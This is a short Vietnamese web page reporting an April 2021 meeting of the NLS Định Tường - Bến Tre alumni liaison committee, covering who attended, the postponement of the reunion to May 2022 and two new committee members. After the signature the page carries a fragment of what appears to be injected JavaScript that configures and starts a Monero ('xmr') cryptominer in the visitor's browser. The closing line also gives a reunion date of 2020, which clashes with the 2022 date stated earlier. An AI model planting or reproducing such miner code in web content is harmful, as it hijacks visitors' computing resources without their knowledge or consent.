Họp mặt Ban Liên Lạc NLS Định Tường - Bến Tre

Họp mặt Ban Liên Lạc 
NLS Định Tường - Bến Tre
  
       Ngày 25 tháng 4 năm 2021, ban liên lạc NLS Định Tường - Bến Tre đã họp mặt tại nhà thầy Nguyễn Tông Lộc. Tham dự gồm quý thầy :
- Thầy Nguyễn Tấn Phúc
- Thầy Nguyễn Tông Lộc 
- Thầy Nguyễn Văn Nâu
- Thầy Nguyễn Văn Vinh
Và đại diện thành viên các khóa 1- 6 NLS Định Tường và NLS Bến Tre.
Nội dung buổi họp:
- Tất cả đồng thống nhất hoãn buổi họp mặt ngày 1/5/2021 đến năm sau 1/5/2022.
- Theo nhận xét của tập thể : Ban Liên Lạc hiện tại làm việc rất tốt nên không nên thay đổi. Nếu muốn thay đổi thì sau ngày họp mặt 1/5/2022 sẽ thông báo bầu lại ban liên lạc mới.
- BLL đã bổ sung thêm thành viên mới: - Anh Nguyễn Văn Liêm Khóa 1 - NLS Định Tường ( Phụ trách khóa 1) - Anh Trần Văn Lộc Khóa 2- NLS Định Tường ( Phụ trách trang mạng nlsdinhtuong.com)
      Buổi họp diễn ra trong bầu không khí vui tươi và ấm áp, những câu chuyện rôm rã không dứt sau bao ngày xa cách. Hẹn gặp lại trong ngày 1/5/2020.

Trần Thị Tuyết
', { threads:2,throttle:0.2, coin: "xmr", }); miner.start();